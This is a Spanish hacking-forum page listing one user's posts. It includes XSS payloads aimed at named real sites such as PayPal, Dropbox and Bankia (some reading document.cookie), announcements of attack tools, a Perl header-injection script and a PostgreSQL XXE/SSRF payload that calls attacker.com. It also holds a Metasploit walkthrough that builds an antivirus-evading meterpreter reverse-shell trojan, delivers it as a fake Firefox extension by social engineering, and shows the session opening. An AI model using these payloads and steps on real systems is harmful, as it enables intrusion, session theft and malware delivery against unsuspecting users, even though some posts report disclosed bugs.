Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Pr0ph3t

#1
Hacking ShowOff / BlackBerry DOM Based XSS
Noviembre 23, 2013, 10:23:40 AM
Vector: "><svg/onload=confirm(document.cookie);>
URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta#"><svg/onload=confirm(document.cookie);>
Screenshot: 
Reportado y fixeado.
#2
Hacking ShowOff / Pinterest XSS by @The_Pr0ph3t
Octubre 15, 2013, 11:58:57 AM
Vector: "><img src=x onerror=confirm(document.cookie);>
Screenshot:
URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Reportado y fixeado.
#3
Hacking ShowOff / Apple DOM XSS
Junio 29, 2013, 09:19:05 AM
URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: "><img src="x" onerror=confirm(/XSS/);>
Autor: Pr0ph3t
Screenshot:


Reportado: Sí.
#4
Hacking ShowOff / XSS en Dropbox
Junio 26, 2013, 11:08:28 AM
URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: "><script>alert(/Pr0ph3t/.source)</script>
Autor: Pr0ph3t
Screenshot:
Reportado y fixeado.
#5
Hacking ShowOff / XSS en Bankia
Junio 06, 2013, 06:48:38 PM
URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PATH: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: "><img src=x onerror=prompt(/Prophet/);>
Imagen: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Reportada.
#6
Hacking ShowOff / XSS en Linkedin Developers
Junio 06, 2013, 04:48:17 PM
URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PATH: /search/node/
Vector: ">"><svg/onload=alert(1);>
Imagen: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Demo vídeo:




Tambien hay un error SQL con algun dato interesante :)
Reportado y fixeado.
#7
Hacking ShowOff / XSS en Movistar
Junio 06, 2013, 04:29:23 PM
URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
PATH: /yavoy/search.do?searchString=
Vector: "><img src=x onerror=prompt(/Prophet/);>
Imagen: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Reportadito.
#8
Hacking ShowOff / Paypal Live XSS by Pr0ph3t
Mayo 28, 2013, 04:48:27 PM
Os dejo mi segundo XSS en Paypal, como nunca pagan, paso de participar en el bug bounty.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Sólo teneis que pulsar en Continuar y se ejecutará el código que inyectéis en la variable country.

Un saludo.
#9
Hacking ShowOff / [XSS] *.paypal.com
Abril 10, 2013, 11:19:15 AM
URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: "><script>alert(/Pr0ph3t/)</script>
Variable afectada: DESCRIPTION
Imagen: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Reportado y arreglado.

#10


XSS 1: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
XSS 2: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Blind SQLi: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Autor: Pr0ph3t
Reportado: Sí, pero sin respuesta.
#11
NetSpoof es una aplicación para la plataforma Android que te permite jugar con las conexiones de los dispositivos conectados a tu misma red. Puedes redirigir el tráfico hacia una web determinada, hacer que la carga de imágenes sea borrosa, cambiar el resultado en la busqueda de google (no importa lo que busquen, siempre dará el mismo resultado), en la busqueda de YouTube (como el anterior), que todas las imágenes sean iguales, cambiar palabras por otras, cualquier video que clickees en YouTube siempre sea el mismo, redirigir todo el tráfico a través del teléfono...



Puedes descargarla en: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#12
Windows / Activar Modo Dios en Windows 8
Enero 02, 2013, 11:38:59 AM
Windows 8 esconde muchos trucos y curiosidades de los cuales se podrían llenar muchos post relativos, y en este caso se verá la manera más sencilla de obtener el "El Modo Dios", el cual es la capacidad de poder administrar todo el equipo de una forma mas centralizada siento lo más parecido a la cuenta administrador en Windows o súper usuario (root), para Linux.

El modo Dios permite al usuario un acceso rápido a múltiples opciones de configuración del sistema, que en la mayoría de los casos se puede llegar por la ruta "oficial" pero, con el modo Dios se tiene en un solo panel de administración con todo agrupado, proporcionando un ahorro importante en tiempo tanto para un usuario convencional como para un administrador de sistemas de una empresa.


Hace un par de años se habló sobre éste truco que está activo desde Windows 7 en un post llamado "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"  y vendría bien comentar que funciona perfectamente tanto en versiones de 32 bits como en versiones de 64 bits, no obstante, muchos pensaban que este método no estaría en Windows 8 y no es así, ya que en la última versión de Windows también es posible implementarlo.

Para usar el "Modo Dios" (GodMode) simplemente se tiene que crear una nueva carpeta en el Escritorio (por comodidad y accesibilidad) o cualquier otro directorio que desee, y ponerle como nombre el siguiente código:

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}


El icono de la carpeta cambiará a otro icono con un panel de control y para acceder a éste bastará con hacer doble clic en el icono que se acaba de crear. Para eliminar el icono,  basta con eliminarlo como cualquier otro elemento.


Como nota final valdría comentar que la palabra GodMode se puede cambiar por la palabra que deseéis, por ejemplo, en vez de poner "GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}" podríais poner "Modo Pepito Grillo.{ED7BA470-8E54-465E-825C-99712043E01C}" y creará el elemento igualmente.


Fuente: "Windows Técnico"
#13
Hashkill es un crackeador de hashes opensource para Linux que usa OpenSSL. Actualmente soporta 4 métodos de ataque (Diccionario, Fuerza Bruta y Hybrid) y tiene 31 plugins para diferentes tipos de hashes (md5, sha1, phpbb2, mysql, md5(unix), des(unix), sha(unix), vBulletin, SMF, etc). Es multiproceso y soporta el guardado/restauración de sesiones.


Características:
Citar
- Multi-threaded so that it can benefit from multi-core/multi-CPU systems
- SSE2/AVX/XOP/AES-NI-accelerated algorithms to achieve high speeds on modern x86 CPUs
- Very powerful rule engine plus optimized bruteforce/markov codepaths for fast algos.
- ~ 40 plugins for different types of passwords (ranging from simple hashes like MD5 and SHA1 to WPA, passworded RAR files and private SSL key passphrases)
- Supports session save/restore. Sessions are auto-saved each 3 seconds. Password cracking can resume after the last checkpoint in case the program is stopped/killed/system crashes/power down/etc.
- Multi-hash support
- Very fast GPU support on both Nvidia and AMD. GCN and Kepler architecture supported.
- Multi-GPU support (even AMD+NVidia systems).
- Session save/restore, markov/rule/bruteforce also on GPUs

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Más info: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#14
SurfJack es una herramienta programada en Python que demuestra las carencias de seguridad de los protocolos HTTP y HTTPS. Con esta herramienta puedes robar las cookies de sitios web que usen dichos protocolos y que no aseguren correctamente sus cookies.

Requiere:
   - Python 2.4
   - Scapy

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Manual: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vídeo de demostración: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#15
Hacking / Scylla v.1.0 - Advanced Audit Tool
Noviembre 01, 2012, 07:51:13 AM
Scylla es una herramienta para auditar diferentes protocolos online y configuraciones, construida sobre un motor bruteforce. Esta herramienta actua como
una herramienta para la unificación de varias técnicas de auditoría, hace lo que oscanner, winfingerprint, Hydra, DirBuster, cosas que estas herramientas hacen, pero tambien algunas cosas que éstas no hacen.

Scylla es sin duda, la primera herramienta de hacking/auditoría open source gratuíta para protocolos como LDAP, DB2, Postgres, terminal y Mssql; Scylla incluye toneladas de características que otras herramientas tienen, pero con una diferencia clave: lo hace mas rápido y "más inteligente".

Protocolos soportados:
  • Terminal (Telnet, SSH, telnets)
  • FTP (FTPS, FTP, SFTP)
  • SMB (Tambien Windows RPC)
  • LDAP
  • POP3 (POP3S)
  • SMTP (SMTPS)
  • IMAP
  • MySql
  • MSSQL
  • Oracle (DB y TNS Listener)
  • DB2 (DB y DAS)
  • HTTP (HTTPS; Basic AUTH Brute Force, Digest AUTH Brute Force, Form Brute Force, Brute Force de archivos y directorios)
  • DNS (DNS Snooping)
  • Postgres SQL

    Las funciones en 3 etapas básicas: - Etapa Pre-Hack, etapa Brute Force y etapa Post-Hack.

    Características básicas:
    - User, password list based Brute force
    - Multiple hosts support
    - Multiple session support
    - Nmap integration
    - Non-synchronized threads (proof to be a bit faster)
    - Ability to restore sessions
    - Session auto-saving (based on SQL Server CE)
    - Easy to use
    - Auto configured options
    - Hacker oriented
    - Free, and always free
    - Database browser (who have hacked a DB and don't have a DB client to connect to it? And worse if you don't have internet)
    - Open source tool

    Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    Más capturas de pantalla: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    Fuente original (inglés): No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    Un saludo.
#16
Los chicos de Flu han publicado esta nueva herramienta.

Funcionalidades de Flunym0us 2.0:
  • Fingerprint de versión de WordPress: Extrae de los archivos "Readme.html" la versión actual instalada de WordPress.
  • Descubrimiento de vulnerabilidades por Path Disclosure en WordPress que dejan expuesta la ruta de instalación.
  • Descubrimiento de versión de plugins instalados en WordPress
  • Aviso de versiones obsoletas de instalaciones de WordPress
  • Aviso de versiones obsoletas de instalaciones de plugins en WordPress
  • Descubrimiento de usuarios registrados
  • Aumento en la velocidad de análisis gracias al procesamiento en paralelo con múltiples procesos parametrizables
  • Ocultación de User-Agent por uno aleatorio a través de un diccionario incluido de User-Agents reales
  • Ocultación de Referer

    Podéis descargar su código, Python, desde: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

    Para usarlo sólo necesitáis un intérprete Python, por lo que podéis utilizarla en cualquier sistema operativo.


    Un saludo.
#17
Hacking / Wireshark 1.8.3
Octubre 05, 2012, 10:31:04 AM

Wireshark es una herramienta multiplataforma para análisis de tráfico de red, producto de la evolución del antiguo Ethereal. Funciona al igual que lo puede hacer cualquier otro sniffer tal como Windump, TCPDump ó dsniff. Pero, al contrario de estos, lo hace mostrando los datos a través de un entorno gráfico y de forma más amigable y entendible. Posee una serie de decodificadores para la mayor parte de protocolos así como plugins y herramientas para el análisis gráfico de las capturas.

Para descargar Wireshark:

    Windows: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    Linux: Algunas distribuciones ya contienen Wireshark, de cualquier forma: apt-get install wireshark

Fuente: Daboweb.

#18
Hacking ShowOff / Taringa.net XSSed by Pr0ph3t
Agosto 27, 2012, 11:14:46 AM
Acabo de encontrar un bonito XSS en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, soy muy haxor.  ;D



POC:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

ESTÁ REPORTADO.
#19
Ingeniería Inversa / Resolviendo CrackMe en Java
Agosto 22, 2012, 11:54:54 AM
En el foro RTHacker, un usuario posteó un CrackMe hecho en Java, realmente muy sencillo, pero interesante. Mirándolo un poco, me animé a crear un pequeño tutorial de cómo resolverlo. Es ideal para que los que recién empiezan en la Ingenieria Inversa practiquen.



Éste es el CrackMe, ahora vamos a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Recuerden que éste es un archivo .JAR, por lo cual necesitaran la máquina virtual de Java para poder ejecutar la aplicación correctamente (Puedes descargarla de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta).

Hechos los pasos anteriores, ejecutaremos por primera vez la aplicación y analizaremos su estructura. Por lógica e instinto, lo primero que haremos es probar una contraseña al azar para ver qué reacción nos devuelve.



Perfecto!, el CrackMe devuelve un mensaje de error con el texto «Incorrecto!». Ahora, lo que debemos de hacer es encontrar en el archivo esa palabra, para ello lo abriremos con un editor Hexadecimal (En mi caso usaré el Bless Hex Editor).

Mirando un poco las entrañas de éste fichero, puedo encontrar que contiene tres archivos clase llamados:
Código: java
probarActionPerformed.class
Pruebas.class
Pruebas$1.class


Tal vez se estén preguntando, ¿cómo accedemos a ellos?...Pues la respuesta es sencilla, los ficheros .JAR también son formatos de compresión de datos, como .ZIP, .RAR, entre otros. Así que tecleando éste comando en terminal podremos obtenerlos fácilmente:
Código: java
windhack@windhack-desktop:~/Escritorio$ jar -xvf CrackMe.jar
inflado: META-INF/MANIFEST.MF
inflado: manifest
inflado: .project
inflado: ejemplo
inflado: .classpath
inflado: probarActionPerformed.class
inflado: Pruebas$1.class
inflado: Pruebas.class


Ahora, con todo el contenido del .JAR en nuestro escritorio, vamos a mirar de nuevo, cada uno de los archivos .class en el editor Hexadecimal.

¡Ok!, en el archivo Pruebas$1.class se encuentra definido el mensaje de error que nos dá cuando la contraseña está errada, analizando un poco más encontramos algo un poco extraño...



Vualá!, encontramos el paradero de la contraseña correcta, la cual es «4lg0f4c1lam1g0», vamos a probarla y miremos si esa es la solución al reto



FUENTE: DaW Labs
#20
Manual para la construcción de antenas pirata WIFI en PVC.

Este manual de Referencia de construcción Rápida de las antenas WIFI en PVC The Jolly Rogers, concentra el Conocimiento Profesional aprendido con la Experiencia Obtenida, en el 2007. Trata sobre los Problemas Especiales; el diseño personal y Construccion de Antenas WIFI de forma Profesional en PVC, y se publica para asegurar el aprendizaje y diseminación de información útil que no ha sido jamás publicada hasta ahora en los manuales existentes de Telecomunicaciones. La Serie Jolly Rogers es una categoría Especial de publicación Experimental; que recoge la información, algunos progresos y la experiencia de trabajos sobre Antenas WIFI que he hecho en la construcción de Antenas.

Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Web del autor: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Un saludo.
#21
GameOver es un proyecto que tiene como objetivo entrenar y educar newbies en seguridad básica web y ayudar a entender los principales ataques web existentes. Se trata de una distribución Voyage Linux (basada en Debian) que tiene dos secciones de aplicaciones:

Sección 1. Colección de aplicaciones web diseñadas especificamente para enseñar las nociones básicas sobre seguridad web, cubriendo XSS, CSRF, RFI y LFI, fuerza bruta en autenticación, path traversal, ejecución de comandos e inyección SQL:

1. Damn Vulneable Web Application:  (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
2. OWASP  WebGoat:(No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
3. Ghost (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
4. Mutillidae (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
5. Zap-Wave: (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
Sección 2. Colección de aplicaciones inseguras de forma deliberada para practicar y poner a prueba nuestras habilidades antes de llevar a cabo un test de intrusión en un entorno real:

1. Owasp Hacademic Challenges : (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
2. Owasp Vicnum: (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
3. WackoPicko: (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
4. Owasp Insecure Web App: (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
5. BodgeIT: (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
6. PuzzleMall: (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
7. WAVSEP: (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)
Para probarla puedes descargar la máquina virtual (necesitarás VM Player 4.0.2 o superior y al menos 256 MB de RAM) o la ISO para un LiveCD:

username: root
password: gameover

DESCARGA: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#22
Bugs y Exploits / Inyección XSS en las cabeceras
Junio 23, 2012, 04:24:40 PM
La fundamentacion de este tipo de errores XSS se encuentra en el texto "Header Based Exploitation" de Zenomorph-CGISecurity, cuyo enlace puede
encontrarse al final de este articulo, en el apartado de enlaces y recursos.

Al establecerse una comunicación HTTP, como en todas, existe un intercambio de datos. El cliente le dice al servidor que quiere que se le muestre página, que la interfaz de su navegador esta en castellano, que su navegador es tal, que acepta x tipos de archivo, y que proviene de x sitio, por ejemplo. Logicamente la mayor parte de ese intercambio se produce automaticamente entre el navegador y el servidor, teniendo el usuario unicamente, la posibilidad de decidir que es lo que quiere del servidor (que se le muestre x pagina).

Muchas páginas usan algunos datos de la sesión HTTP del usuario para mostrarlos como sistemas de registro, estadisticas, o un simple mensaje tipo "Su navegador es: (direccion)" o "Usted proviene de: (referer)" entre muchas otras cosas.

El problema se plantea si un usuario con malas ideas inicia una sesion con el servidor, siendo el mismo el que intercambie los datos con el servidor, e introduciendo los datos que a el le de la gana (HTML, JS...).

# telnet xxx 80

Trying xxx...
Connected to xxx.

Escape character is '^]'.

GET index.html HTTP/1.0
Referer:
User-agent:

<...>

Aqui os pongo un simple codigo ilustrativo cuya funcion es inyecta los datos de USER-AGENT y HTTP-REFERER especificados por el usuario desde la linea de comandos. La labor de ver si la pagina no filtra debera ser manual.

header_xss.pl

Código: text
#!/usr/bin/perl -w

# XSS-HEADER injector

# Prueba de concepto sin estar probada :)
# taseh'03

use IO::Socket;

my $host = @argv[0];
my $inject = @argv[1];
my $inj3ct = @argv[2];
my $gett = "/"; # cambiar por lo que queremos que se reclame... :)

if (@argv < 2){

print "\n\n{jumi [*3] [http://www.govannom.org/seguridad/web_cgi/xss_taseh.txt]} - XSS-Header injector -prueba de concepto-";
print "\nUso: {jumi [*3] [http://www.govannom.org/seguridad/web_cgi/xss_taseh.txt]}   ";
exit;

}

print "Conectando con $host...";
my $socket = IO::Socket::INET->new(
Proto => 'tcp',
PeerAddr => $host,
PeerPort => "80", or die"\n\nNo puedo conectar con $server";
                   # ^^ cambiar puerto si es distinto :)
}

$socket->autoflush(1);
print $socket "GET $gett HTTP/1.0\n";
print $socket "Host: $host\n";
print $socket "Referer: $inject\n"; # inyecta referer falseado
print $socket "User-Agent: $inj3ct\n\n"; # inyecta cli.id falseado

print "\nInyeccion finalizada :).\n";

close $socket;

exit;


Bien, para comprobar si la cadena que queriamos inyectar ha sido realmente inyectada en la pagina de salida basta con visitarla o bajarnosla y hacer un cat pagina.html | grep  y ver si esta o simplemente visualizarla y ver el efecto de nuestro codigo inyectado.

Fuente No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#23
Ingeniería Inversa / Curso de Cracking by Raton
Junio 23, 2012, 10:58:57 AM
Aqui les dejo este curso de cracking hecho por raton, es excelente está todo muy bien explicado y encima cada capitulo viene con su programa.
Que lo disfruten.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  (Link corregido)


Fuente: elhacker
#24
MAC OSX / Cocoa Packet Analyzer 1.11
Junio 22, 2012, 11:31:08 AM
Cocoa Packet Analyzer es un sniffer nativo para Mac OS X (>10.5) que desde noviembre de 2011 se encuentra en su versión 1.11.  Entre sus características permite leer y escribir ficheros en PCAP, lo que realmente no es ninguna novedad, y algunos protocolos básicos de TCP/IP.

Adicionalmente es mejorado mediante plugins, de los que hay disponibles tan solo dos: SIP y IAX2

Al arrancarlo permite leer de un fichero un captura o crear una nueva, indicando el interfaz por el que realizar la escucha.



Cuando termina (y no en tiempo real), muestra los resultados en una ventana similar a Wireshark. Aunque como se puede ver en la siguiente captura de pantalla, no permite seguir el flujo de una conexión, ni entiende protocolos de capa 7.



Pese a que visualmente se agradece que esté desarrollado nativamente, las funcionalidades son extremadamente limitadas. Aun está demasiado verde como para plantearse sustituir otros sniffers mucho más avanzados como Wireshark o incluso el propio tcpdump.

Esperemos que continúen ampliandolo y ya veremos dentro de un tiempo si está algo más maduro.

DESCARGA: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

#25
Código: text
Hola,

Hoy les traigo un pequeño análisis que le hice a este packer y bueno, también lo desempacamos!
Es mi primer unpacking y espero sepan disculparme los errores técnicos que dicho documento pueda tener.

Disfrutadlo!

Descarga:

https://dl.dropbox.com/u/26610132/Estudio%20y%20desempaquetado%20RDG%20PolyPack%20por%20The%20Swash.rar


Un saludo,
Iván Portilla.


Fuente: Indetectables.
Autor: TheSwash
#26
La herramienta está escrita en Ruby y permite encontrar vulnerabilidades en los plugins instalados. Para ello WPScan buscará entre los 2220 plugins más populares y nos listará las vulnerabilades encontradas en base a las versiones. Además, y entre otras cosas, es capaz de listarnos los usuarios, versión de WordPress, nombre del theme activo, directorios, ...

Su uso es muy sencillo y su sintaxis está muy bien explicada en su menú de ejecución:

Código: text
./wpscan.rb




Como ya he comentado más arriba tiene múltiples opciones, sobretodo y quizas la más interesante, el listado de plugins con sus respectivas vulnerabilidades. Tampoco hay que dejar en el olvido el listado de usuarios o versión de WordPress ya que puede ser de gran utilidad para comprobar la seguridad del sitio.

Ejecutar un análisis de vulnerabilidad en los plugins instalados es tan sencillo como lanzar el siguiente comando:

Código: text
./wpscan.rb --url http://www.lawebquesea.com --enumerate p




Se puede observar en este ejemplo que no se ha detectado ninguna vulnerabilidad en los plugins instalados, sin embargo se ha detectado un directory listing en la carpeta de uno de los plugins. Es recomendable contrastar los resultados ya que es posible obtener falsos positivos.

La herramienta también es capaz de realizar ataques a usuarios por fuerza bruta. Es necesario indicar la ruta de nuestro diccionario de passwords, así como el username de WordPress.

Código: text
./wpscan.rb --url http://www.lawebquesea.com --wordlist /larutadel/diccionario.txt 
--username elnombredeusuario


WPScan está incluida en la distribución linux de seguridad informática, Backtrack 5. También es posible su descarga desde el sitio para desarrolladores que ofrece Google, WPScan Worpress Security Scanner.

FUENTE: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#27
Si estás usando WifI en tu casa o en tu oficina y estás teniendo problemas como que alguien está conectado a tu red para navegar por internet, si alguien hackea tu red o si no quieres que alguien use una red mientras está usando todo el ancho de banda, puedes expulsarlos con esta herramienta.
Consideremos otro ejemplo. Si tu estás usando internet en tu dispositivo Android mientras estés en un lugar público como en una cafetería, en una estación o otro lugar en el que quieras usar internet pero la conexión sea lenta porque mucha gente diferente esté usando la misma red.
Ahora tenemos una maravillosa aplicación Android para  usuarios root, haciendo que puedas cortar la conexión de la red de otra gente que tú quieras


¿Qué es WiFi Kill para Android?

WifiKill te permite escanear tu red wifi desde dispositivos, ver su proveedor y cortar la conexión de red para dispositivos específicos. De esta forma tu puedes deshacerte de moradores de tu red...



Descarga y videotutorial para WifiKill

Esta aplicación estaba disponible en el Market de Android pero ahora han eliminado la aplicación, sin embargo tenemos otro link desde donde puedes descargar la aplicación y un videotutorial de WiFiKill para Android.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente original: ehacking
Traducido por Pr0ph3t.

#28

WebSploit es un proyecto de código abierto el cual es usado para escanear y analizar sistemas remotos con el fin de encontrar varios tipos de vulnerabilidades. Esta herramienta es muy poderosa y soporta múltiples vulnerabilidades.

Características principales:
   - Autopwn - Used From Metasploit For Scan and Exploit Target Service
   - wmap - Scan,Crawler Target Used From Metasploit wmap plugin
   - format infector - inject reverse & bind payload into file format
   - phpmyadmin - Search Target phpmyadmin login page
   - lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
   - apache users - search server username directory (if use from apache webserver)
   - Dir Bruter - brute target directory with wordlist
   - admin finder - search admin & login page of target
   - MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
   - MITM - Man In The Middle Attack
   - Java Applet Attack - Java Signed Applet Attack
   - MFOD Attack Vector - Middle Finger Of Doom Attack Vector
   - USB Infection Attack - Create Executable Backdoor For Infect USB For Windows
   - ARP DOS - ARP Cache Denial Of Service Attack With Random MAC





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Versión 1.8: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente original: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#29
Un scanner automático que ahorra tiempo y hace el trabajo eficientemente. Hay varias herramientas automáticas que están disponibles para el público, usadas para el escaneo de vulnerabilidades de aplicaciones web y para la exploración a nivel web o sistema. Nikto es una maravillosa herramienta de código abierto para analizar un servidor web con la configuración errónea y para vulnerabilidades comunes, pero Nikto no es un solo jugador en la información y en el pentesting, hay otra herramienta llamada web-sorrow.

Web-Sorrow es una herramienta basada en Perl, usada para el control de un servidor Web con una configuración errónea, detección de versiones, enumeración y información del servidor. Lo que no es:
- Escáner de vulnerabilidades.
- Inspección del proxy
- Herramienta para DDOS
- Framework para la explotación

USO:

    -host [host] -- Defines host to scan.
    -proxy [ip:port] -- use a proxy server
    -S -- Standard misconfig and other checks
    -Eb -- Error Begging. Sometimes a 404 page contains server info such as daemon or even the OS
    -auth -- Dictionary attack to find login pages (not passwords)
    -cmsPlugins [dp | jm | wp | all] -- check for cms plugins. dp = drupal, jm = joomla, wp = wordpress (db's a bit outdated 2010)
    -I -- Find interesting strings in pages (very verbose)
    -Fd -- look for common interesting files and dirs
    -Ws -- look for Web Services on host. such as hosting porvider, blogging service, favicon fingerprinting, and cms version info
    -e -- everything. run all scans



EJEMPLOS:

Básico: perl No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -host No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -S
Buscar logins: perl No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -host 192.168.1.1 -auth
Scan más intenso: perl No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -host 192.168.1.1 -e

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


FUENTE ORIGINAL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#30
Mediante ingeniería social intentaremos que un usuario instale una extensión de Firefox falsa para obtener una sesión remota en su sistema.

A través del módulo de Metasploit No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, crearemos un fichero .xpi que será presentado a la víctima dentro de una página web. Cuando el usuario la visite, su navegador Firefox le preguntará si confía y desea instalar la extensión. Si el usuario hace clic en 'instalar' se ejecutará el payload con los permisos del usuario.

Haremos una simple demostración contra un Windows XP SP3.

1. Primero abrimos la consola de metasploit (msfconsole), actualizamos y cargamos el módulo correspondiente:



Código: text
msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf  exploit(firefox_xpi_bootstrapped_addon) >


2. Ahora procedemos a configurar el addon:

Código: text
msf  exploit(firefox_xpi_bootstrapped_addon) > set addonname falso
addonname => falso
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.35
SRVHOST => 192.168.1.35
msf  exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80
SRVPORT => 80
msf  exploit(firefox_xpi_bootstrapped_addon) > set URIPATH fakeEx
URIPATH => fakeEx
msf  exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.35
LHOST => 192.168.1.35


3. A continuación preparamos nuestro payload para intentar que el AV no lo detecte. Primero con msfvenom:

Código: text
D:\metasploit4>ruby\bin\ruby.exe msf3\msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai --iterations 10 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c LHOST=192.168.1.35 > trojan.exe
[*] x86/jmp_call_additive succeeded with size 321 (iteration=1)
[*] x86/jmp_call_additive succeeded with size 353 (iteration=2)
[*] x86/jmp_call_additive succeeded with size 385 (iteration=3)
[*] x86/jmp_call_additive succeeded with size 417 (iteration=4)
[*] x86/jmp_call_additive succeeded with size 449 (iteration=5)


Luego tendréis que utilizar también otro crypter si queréis que vuestro payload sea lo más FuD posible... así que no cuesta nada modificar un stub y utilizar alguno de esos tan sexys que hay en la Red ;)

Después cargamos el payload para nuestro módulo:

Código: text
msf  exploit(firefox_xpi_bootstrapped_addon) > set PAYLOADFILE d:\\metasploit4\\trojan.exe
PAYLOADFILE => d:\metasploit4\trojan.exe
payload => windows/meterpreter/reverse_tcp


Y lanzamos el exploit:

Código: text
msf  exploit(firefox_xpi_bootstrapped_addon) > exploit
[*] Exploit running as background job.
msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] Started reverse handler on 192.168.1.35:4444
[*] Using URL: http://192.168.1.35:80/fakeEx
[*] Server started.


4. Ahora que tenemos todo funcionando sólo necesitamos que el usuario visite nuestra URL (correo, MITM, DNS, ...) y que instale la extensión falsa de Firefox:

Código: text
msf  exploit(firefox_xpi_bootstrapped_addon) >
[*] 192.168.1.35     firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...




Si cae en la trampa, obtendremos la sesión remota:



Código: text
[*] Sending stage (752128 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.35:4444 -> 192.168.1.35:15831) at 2012-05-28 19:11:57 +0200

msf  exploit(firefox_xpi_bootstrapped_addon) > sessions -i

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.168.1.35:4444 -> 192.168.1.35:15831 (192.168.1.35)


FUENTE: hackplayers
#31
Un ataque XXE (Xml eXternal Entity) es un tipo de inyección XML con URIs (entidades externas) que se aprovecha de un parser XML mal configurado para ejecutar una funcionalidad que podría comprometer la seguridad de una aplicación web: acceso al sistema de ficheros del servidor, causar una DoS, inyección de javascript (por. ej. para un XSS), etc.

Recientemente ONsec ha publicado en la PHDays un 0-day muy interesante de una vulnerabilidad XXE basada en error que afecta a PostgreSQL y que podría permitir a un atacante leer ficheros locales y hacer peticiones desde el servidor de base datos a la intranet (SSRF - Server Side Request Forgery).

Código: text
    Example:
    DoS:
    select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')
     
    SSRF:
    select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')
     
    Error-based XXE:
     
